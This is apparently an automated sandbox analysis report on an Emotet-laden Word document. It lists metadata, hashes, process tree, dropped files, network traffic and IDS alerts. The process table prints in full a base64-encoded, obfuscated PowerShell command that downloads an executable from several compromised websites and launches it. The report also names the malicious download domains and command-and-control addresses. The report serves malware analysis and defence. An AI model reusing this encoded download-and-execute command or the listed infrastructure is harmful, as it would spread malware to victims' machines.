File name: | 2020-16-10-9198856.doc |
Full analysis: | https://app.any.run/tasks/cf801303-d03d-48c0-b4da-c6f8c5700409 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 19, 2020, 20:34:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Et., Author: Evan Jean, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Oct 15 23:22:00 2020, Last Saved Time/Date: Thu Oct 15 23:22:00 2020, Number of Pages: 1, Number of Words: 3715, Number of Characters: 21176, Security: 8 |
MD5: | AE1F589EADD2BE17832BC0BD2FE3134A |
SHA1: | 6A7941D9AC2F33E1D2D4DA29A1D7330FE715817C |
SHA256: | C97612FA3E5F2AAC90D806B99BAD47C67F42D3A636CB9702F06CF11DE4F3A310 |
SSDEEP: | 3072:uBeY5kb0TUNAuBqVPlB11nBMxeOWdFllOBRhwg:uEYOb0TUquBqt7nB+5WkRhwg |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
LocaleIndicator: | 1033 |
CodePage: | Unicode UTF-16, little endian |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 24842 |
Paragraphs: | 49 |
Lines: | 176 |
Company: | - |
Security: | Locked for annotations |
Characters: | 21176 |
Words: | 3715 |
Pages: | 1 |
ModifyDate: | 2020:10:15 22:22:00 |
CreateDate: | 2020:10:15 22:22:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Evan Jean |
Subject: | - |
Title: | Et. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
544 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2020-16-10-9198856.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2672 | POwersheLL -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIAAyADAAIAArACAAMQAwACAAKwAgADEAMAApACAAKwAgACQAQQB3AF8AMgA3AGYAbwA7ACQARwBuAGcAbgAwADQAcAA9ACgAJwBGACcAKwAoACcAMgBxACcAKwAnAGoAJwApACsAKAAnADYAJwArACcAdgBfACcAKQApADsAWwBzAHkAcwB0AGUAbQAuAGkAbwAuAGQAaQByAGUAYwB0AG8AcgB5AF0AOgA6ACIAYwBgAFIAZQBhAFQARQBgAGQAaQByAGAARQBDAHQAbwByAHkAIgAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACcAewAwAH0AQwAnACsAKAAnAHUAMwBkACcAKwAnAHAAdgAnACkAKwAnAGIAJwArACcAewAnACsAJwAwAH0ARAA3ADQAYQA4AHEAJwArACcAdQB7ADAAfQAnACkAIAAtAGYAWwBjAGgAYQBSAF0AOQAyACkAKQA7ACQARwAxAGkANAAxADYAcwA9ACgAKAAnAEwANQAzACcAKwAnADMAJwApACsAJwBiACcAKwAnAHcAZwAnACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAGAAQwB1AHIAaQBgAFQAYAB5AFAAcgBPAFQAYABvAEMAYABPAGwAIgAgAD0AIAAoACgAJwBTACcAKwAnAHMAbAAnACkAKwAoACcAMwAsAFQAJwArACcAbABzACwAJwApACsAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMQAnACkAKwAnACwAJwArACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAFUAOABoAHkAaQBpAGUAPQAoACcAUgAnACsAKAAnAHkAcwAnACsAJwB5AHUAJwApACsAJwB6ADUAJwApADsAJABHAGMAeABlAHcAeQBmACAAPQAgACgAJwBRAGwAJwArACgAJwByAGYAOQAnACsAJwB2ACcAKQArACcAZQAnACkAOwAkAFcAawA5AGUAYQB5AGEAPQAoACgAJwBPADAAcgA5ACcAKwAnAG4AJwApACsAJwBtACcAKwAnAHEAJwApADsAJABQAGkAZABiAG0ANgBtAD0AKAAnAFoAJwArACgAJwBsACcAKwAnAGYAMgAnACkAKwAoACcAZQBhACcAKwAnAHUAJwApACkAOwAkAE4AbwA3ADUAawBnAGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACgAJwBDAHUAMwBkACcAKwAnAHAAJwApACsAJwB2AGIAJwArACcAewAwAH0ARAA3ACcAKwAoACcANAAnACsAJwBhADgAcQAnACkAKwAnAHUAewAwAH0AJwApAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABHAGMAeABlAHcAeQBmACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQAVQA0ADMAMABsAF8AXwA9ACgAKAAnAFIANwBkAHcAaAAnACsAJwA3ACcAKQArACcAZAAnACkAOwAkAEkAeABqAG0AcAAzAGoAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQB0AC4AdwBlAEIAQwBsAEkARQBuAFQAOwAkAEIAXwAyADMANwBhAGYAPQAoACgAJwBoAHQAdABwADoAJwArACcALwAnACkAKwAoACcALwBqACcAKwAnAGEAcwBoACcAKQArACgAJwBtAHUAcwBpAGMALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKwAnAHcAcAAtAGkAbgBjAGwAdQBkAGUAJwArACcAcwAvACcAKwAnAHUAZQBUACcAKQArACgAJwBtAGUAeAAnACsAJwAvACcAKwAnACoAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGMAbwBuAHMAdQBsACcAKwAnAHQAJwArACcAbQB5AGEAZAB2AG8AJwArACcALgBjAG8AJwApACsAKAAnAG0AJwArACcALwBjAG8AJwApACsAJwBuACcAKwAnAHQAJwArACcAZQBuACcAKwAoACcAdAAvAEoAcgAnACsAJwA2ACcAKQArACgAJwAvACoAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwB0AGgAJwArACcAZQAnACkAKwAoACcAZAAnACsAJwBpAGIAYgBzACcAKwAnAGEAcABwACcAKwAnAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGIAYQBjAGsAdQAnACsAJwBwAC0AMQA0AC0AMQAwACcAKwAnAC0AMgAwADIAJwArACcAMAAnACkAKwAnAC8AJwArACcAeQBCACcAKwAoACcAVgAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAnADoALwAnACsAJwAvAGMAJwArACgAJwBlAHMAdQAnACsAJwByAGwAYQAnACkAKwAoACcAcgBzAGUAYQByAGEAeQAuAGMAbwAnACsAJwBtAC8AJwArACcAdwBwAC0AJwArACcAYQAnACkAKwAnAGQAJwArACgAJwBtACcAKwAnAGkAJwArACcAbgAvAFIAdQBNACcAKQArACgAJwBwAGQAJwArACcATgAnACkAKwAnAEQAJwArACgAJwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwBtACcAKwAnAGUAdAAnACsAJwBoAGkAbAAnACkAKwAoACcAaQBuACcAKwAnAGYAbwB0ACcAKwAnAGUAYwBoAC4AJwArACcAYwAnACsAJwBvAG0ALwAnACsAJwBtAGEAbAAnACkAKwAnAGkAZwAnACsAJwBhACcAKwAoACcALwAnACsAJwBPAEYAYgAnACkAKwAnAHIALwAnACsAJwAqACcAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKQArACgAJwAvAC8AYQBuAHQAaABvACcAKwAnAG4AJwArACcAeQBzAGEAJwArACcAcgBhAG4AZAByAGUAJwApACsAKAAnAGEALgAnACsAJwBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AYwBvAG4AdABlACcAKwAnAG4AdAAnACkAKwAnAC8AJwArACgAJwBHACcAKwAnAGUALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKwAnADoALwAvACcAKQArACgAJwB1ACcAKwAnAHAAJwArACcAYwBsACcAKwAnAG8AdQBkAHcAZQBiAC4AJwApACsAJwBjAG8AJwArACgAJwBtAC8AYwBvACcAKwAnAG4AdABlAG4AdAAvACcAKwAnAEcAVgAnACkAKwAoACcASQAnACsAJwA3AC8AJwApACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFcAcQB1AHoAcgBjAGMAIAArACAAJABHADUAagBkADIAcgB3ACAAKwAgACQAWQBnAGYAMQB0AGoAcwApADsAJABLAGsAZgB2AHUAcwAxAD0AKAAnAEcAYwAnACsAKAAnAG8AcgAnACsAJwAyADIAdAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwA0AHEAXwBrAGwAdAAgAGkAbgAgACQAQgBfADIAMwA3AGEAZgApAHsAdAByAHkAewAkAEkAeABqAG0AcAAzAGoALgAiAGQAbwBXAE4AYABMAGAAbwBgAEEAZABmAEkATABlACIAKAAkAFMANABxAF8AawBsAHQALAAgACQATgBvADcANQBrAGcAZAApADsAJABGADYANwB5AHEANgAxAD0AKAAnAFMAMgAnACsAJwBhACcAKwAoACcAZQA2AGoAJwArACcAdAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABOAG8ANwA1AGsAZwBkACkALgAiAGwAZQBuAEcAYABUAGgAIgAgAC0AZwBlACAAMgA4ADkAOAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpACcAKwAnAG4AJwArACgAJwAzADIAJwArACcAXwBQAHIAJwArACcAbwBjACcAKQArACgAJwBlACcAKwAnAHMAcwAnACkAKQApAC4AIgBDAFIAZQBhAGAAVABlACIAKAAkAE4AbwA3ADUAawBnAGQAKQA7ACQATwBoADkAMgBzADEAbgA9ACgAJwBZACcAKwAoACcAcQBwACcAKwAnAHoAJwArACcAdwBrAGgAJwApACkAOwBiAHIAZQBhAGsAOwAkAEIAcgB5AG8ANQBlAHQAPQAoACcASwA2ACcAKwAnADUAcwAnACsAKAAnAHYAMwAnACsAJwBfACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAGMAaAB1AHcAbgAxAD0AKAAoACcATgAnACsAJwA5AHMAcAAnACkAKwAnAGsAYgAnACsAJwBlACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2164 | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | wmiprvse.exe | |
User: admin Company: Steffen Lange Integrity Level: MEDIUM Description: Password Changer Exit code: 0 Version: 1.0.0.1 | ||||
3628 | "C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe" | C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe | Qlrf9ve.exe | |
User: admin Company: Steffen Lange Integrity Level: MEDIUM Description: Password Changer Version: 1.0.0.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3CA3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2672 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1SHA6ZV8C2JC6C741F3E.temp | — | |
MD5:— | SHA256:— | |||
544 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:FB662A8D89AB2DB7BE0BDA0159E1637E | SHA256:B36982C25204FA08F5BECFC55BC5E5786AD3E54B69658F3A4A112CC5AA04A452 | |||
2672 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:F17FB243611FC8D2B382ABB444B83A98 | SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869 | |||
544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:31C6FDB776B17A8C6494B66F92506AA2 | SHA256:13864DE11C8D201328FF2DD83315FC3DDC526696F884A2515CD7D51DBD17C3C0 | |||
2164 | Qlrf9ve.exe | C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe | executable | |
MD5:9F1E91C3FAF940E244B27E2E06DAC739 | SHA256:64DDE4FD3D4323F431A117D893AA75278EF8A988968747671F135E3C6B851158 | |||
2672 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1249c3.TMP | binary | |
MD5:F17FB243611FC8D2B382ABB444B83A98 | SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869 | |||
544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$20-16-10-9198856.doc | pgc | |
MD5:C6A1A22EA13AF8A9758F0B93F1EED213 | SHA256:77386DF4C30A7DC386B3F958463113A3C3FE5FEBE33E019AC0A51AC54FCAF244 | |||
2672 | POwersheLL.exe | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | executable | |
MD5:9F1E91C3FAF940E244B27E2E06DAC739 | SHA256:64DDE4FD3D4323F431A117D893AA75278EF8A988968747671F135E3C6B851158 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2672 | POwersheLL.exe | GET | 200 | 69.65.3.197:80 | http://methilinfotech.com/maliga/OFbr/ | US | executable | 361 Kb | suspicious |
2672 | POwersheLL.exe | GET | 404 | 107.180.51.103:80 | http://thedibbsapp.com/backup-14-10-2020/yBV/ | US | html | 18.2 Kb | malicious |
2672 | POwersheLL.exe | GET | — | 72.167.191.65:80 | http://p3nlhclust404.shr.prod.phx3.secureserver.net/SharedContent/redirect_0.html | US | — | — | unknown |
2672 | POwersheLL.exe | GET | 302 | 160.153.138.219:80 | http://www.consultmyadvo.com/content/Jr6/ | US | html | 265 b | malicious |
3628 | IPBusEnumProxy.exe | POST | — | 208.180.207.205:80 | http://208.180.207.205/5tMqdIvMrmlmEvfV/ | US | — | — | malicious |
2672 | POwersheLL.exe | GET | 404 | 173.212.251.233:80 | http://cesurlarsearay.com/wp-admin/RuMpdND/ | DE | html | 315 b | unknown |
3628 | IPBusEnumProxy.exe | POST | 200 | 167.114.153.111:8080 | http://167.114.153.111:8080/GvXXVjXieWrr9Ju/FfaAxcs0DNFVG53mg9p/CfpG4LaolRjYSKc/oQLS7evNzVRcI0JC/eIRYIVI65otjp3mp/aMTAR36DZxxnw/ | CA | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3628 | IPBusEnumProxy.exe | 208.180.207.205:80 | — | Suddenlink Communications | US | malicious |
2672 | POwersheLL.exe | 107.180.51.103:80 | thedibbsapp.com | GoDaddy.com, LLC | US | malicious |
3628 | IPBusEnumProxy.exe | 167.114.153.111:8080 | — | OVH SAS | CA | malicious |
2672 | POwersheLL.exe | 69.65.3.197:80 | methilinfotech.com | GigeNET | US | suspicious |
2672 | POwersheLL.exe | 43.255.154.57:80 | jashmusic.com | GoDaddy.com, LLC | SG | malicious |
2672 | POwersheLL.exe | 72.167.191.65:80 | p3nlhclust404.shr.prod.phx3.secureserver.net | GoDaddy.com, LLC | US | unknown |
2672 | POwersheLL.exe | 173.212.251.233:80 | cesurlarsearay.com | Contabo GmbH | DE | unknown |
2672 | POwersheLL.exe | 160.153.138.219:80 | www.consultmyadvo.com | GoDaddy.com, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
jashmusic.com |
| malicious |
www.consultmyadvo.com |
| malicious |
p3nlhclust404.shr.prod.phx3.secureserver.net |
| unknown |
thedibbsapp.com |
| unknown |
cesurlarsearay.com |
| unknown |
methilinfotech.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2672 | POwersheLL.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2672 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2672 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2672 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2672 | POwersheLL.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3628 | IPBusEnumProxy.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |
3628 | IPBusEnumProxy.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |